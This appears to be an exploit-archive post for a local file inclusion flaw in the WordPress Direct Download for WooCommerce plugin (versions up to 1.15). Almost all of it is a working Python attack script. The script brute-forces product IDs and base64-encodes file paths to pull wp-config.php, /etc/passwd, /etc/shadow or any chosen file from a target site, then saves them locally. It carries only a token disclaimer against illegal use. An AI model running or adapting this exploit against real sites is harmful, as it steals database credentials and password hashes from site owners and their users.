WordPress Direct Download for WooCommerce versions up to 1.15 suffer from a local file inclusion vulnerability.
bb66f3e733500d157bafada42f0d1eba
#lfi_attack_for_direct_download_woocommerce.py
#
# Author: Diego Celdran Morell
# Web: http://www.diegoceldran.es/
# Fecha Ultima actualizacion: 15/01/2017
# Version: V1.0
# No me hago responsable del mal uso que se le pueda dar a esta herramienta
#
import os;
try:
#pip install urlopen
import requests;
except (Exception):
#ejecutar pip install urlopen
print(" Installing required modules...");
os.system("pip install requests");
from urllib2 import urlopen
try:
#pip install urlopen
import base64;
except (Exception):
#ejecutar pip install urlopen
print(" Installing required modules...");
os.system("pip install base64");
import base64
def make_exploit(download_link):
lnk_download = download_link;
parts = lnk_download.split("/direct-download/");
toDecode = parts[1];
domain = parts[0];
if (toDecode[:-1] == "/"):
toDecode = toDecode[:count(toDecode)-1];
else:
toDecode = toDecode;
decoded = str(base64.b64decode(toDecode.encode('ascii')).decode('utf-8'));
productID = decoded.split("|")[0];
print(" ");
print(" ProductID: " + productID);
print(" ");
eject_exploit(productID, domain);
def eject_exploit(productID, domain):
print(" Select a file to download");
print(" [0] wp-config.php");
print(" [1] /etc/passwd");
print(" [2] /etc/shadow");
print(" or select another path to file to download");
print(" ");
optDownload = input(" >>> ");
print(" ");
if (domain[:7] == "http://"):
domain = domain;
elif (domain[:8] == "https://"):
domain = domain;
else:
domain = "http://" + domain;
if (optDownload == "0"):
fileToDownload = "wp-config.php";
elif (optDownload == "1"):
fileToDownload = "/etc/passwd";
elif (optDownload == "2"):
fileToDownload = "/etc/shadow"
else:
fileToDownload = optDownload;
url = domain + "/direct-download/" + base64.b64encode((str(productID) + "|" + fileToDownload).encode('ascii')).decode('utf-8');
print(" Downloading " + fileToDownload + " file from " + domain);
print(" Accesing to " + url);
print(" ");
req = requests.get(url);
if (req.status_code == 200):
print(" File downloaded correctly!");
fileName = fileToDownload.replace("\\", "/");
file = fileName.split("/");
fileText = str(file[-1]);
f = open(fileText, 'w');
f.write(req.text);
f.close();
print(" Acces to this file in: " + str(os.path.dirname(os.path.abspath(__file__))) + " folder");
print(" ");
else:
print(" [-] This domain is not vulnerable");
eject_exploit(productID, domain);
def get_product_id(domain, minID, maxID):
if(maxID == False):
maxID = 999999999999999999;
url = "";
if (domain[:7] == "http://"):
print(domain[:7]);
url = domain;
elif (domain[:8] == "https://"):
prin(domain[:8]);
url = domain;
else:
url = "http://" + domain;
if (url[:-1] == "/"):
url = url + "direct-download/";
else:
url = url + "/direct-download/";
actuallyId = minID;
idProduct = 0;
while (idProduct == 0 and actuallyId <= maxID):
encodedURL = base64.b64encode((str(actuallyId) + "|").encode('ascii'));
urlToTest = url + str(encodedURL.decode("utf-8")) + "/"
print(" Testing ID: " + str(actuallyId) + "; Getting URL: " + urlToTest);
#print("");
req = requests.get(urlToTest);
if (req.status_code == 200):
if("This product is not available for direct free download." in req.text):
# testing text you recibe
print(" [-] No product fount with ID: " + str(actuallyId));
print(" ");
else:
print(" [+] A product ID was fount: " + str(actuallyId));
print(" ");
idProduct = actuallyId;
else:
print(" [-] This domain is not vulnerable");
actuallyId = actuallyId+1;
if (idProduct != 0):
eject_exploit(idProduct, domain);
def testin_get_a_download_link(domain):
print(" Do you want try to find a valid URL for the website?");
print(" [0] no, exit");
print(" [1] yes, it may have a long time");
print(" ");
test_find = input(" >>> ");
print(" ");
if (test_find == "1"):
# Proseguir
print(" Please select the minimun id to find the product (0 to none; minimun id to start recomended: 400)");
minID = input(" >>> ");
print(" ");
if (minID == "0"):
minID = 1;
else:
minID = int(minID);
print(" Please select the maximun id to find the product (0 to stop manually when you want)");
maxID = input(" >>> ");
print(" ");
if (maxID == "0"):
maxID = False;
else:
maxID = int(maxID);
get_product_id(domain, minID, maxID);
else:
exit();
def get_download_link(domain):
print(" Please");
print(" Set a download link from the website: ");
print(" [0] I don't have any download link");
print(" ");
download_link = input(" >>> ");
print(" ");
if (download_link == "0"):
testin_get_a_download_link(domain);
else:
make_exploit(download_link);
def get_download_link_no_domain():
print(" Please");
print(" Set a download link from the website: ");
print(" [0] I don't have any download link");
print(" ");
download_link = input(" >>> ");
print(" ");
if (download_link == "0"):
print(" Please, select the domain to attack");
domain = input(" >>> ");
print("");
testin_get_a_download_link(domain);
else:
make_exploit(download_link);
def check_vulnerable_domain(domain = "diegoceldran.es"):
# Check if domain/direct-download/a/ return any thing
if (domain[:7] == "http://"):
url = domain;
elif (domain[:8] == "https://"):
url = domain;
else:
url = "http://" + domain;
if (url[:-1] == "/"):
url = url + "direct-download/a/";
else:
url = url + "/direct-download/a/";
req = requests.get(url);
if (req.status_code == 200):
print(" The web site: " + url + " respond: ");
print(" " + req.text);
print(" [+] This domain is maybe vulnerable");
print(" ");
get_download_link(domain);
else:
print(" [-] This domain is not vulnerable");
print(" ");
print(" LFI Attack for Direct Download Woocommerce plugin is started!");
print(" ");
print(" If you're using this module out of BrutiFramework, please, visit");
print(" http://www.diegoceldran.es/brutiframework-alfa/ to Download ");
print(" BrutiFramework from the oficial site. Thanks!");
print(" ");
print(" IMPORTANT:\n NO USE THIS EXPLOIT FOR ILEGAL PURPOSES");
print(" ");
print(" Select the target: (ej: www.diegoceldran.es)");
print(" [0] Omit the checking progress");
print(" ");
domain = input(" >>> ");
if (domain != "0"):
print(" ");
print(" Checking " + domain + "...");
print(" ");
check_vulnerable_domain(domain);
else:
print(" ");
get_download_link_no_domain();